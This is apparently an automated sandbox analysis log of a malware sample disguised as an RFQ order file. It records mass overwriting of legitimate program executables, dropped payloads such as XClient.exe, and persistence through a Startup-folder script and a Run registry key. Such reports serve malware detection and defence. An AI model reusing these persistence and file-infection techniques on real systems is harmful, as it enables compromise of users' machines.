Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe System file written: C:\Windows\System32\alg.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\notification_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Local\Temp\XClient.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Local\Temp\build.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7z.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe File created: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe File created: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe File created: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\user\AppData\Local\Temp\XClient.exe File created: C:\Users\user\AppData\Roaming\XClient.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe File created: C:\Windows\System32\alg.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\Installer\setup.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe File created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\notification_helper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\pwahelper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\identity_helper.exe

Boot Survival

Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exhilaratingly.vbs
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 0_2_02FACBD0
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004048D7
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00485376
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00423187
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Process information set: NOOPENFILEERRORBOX
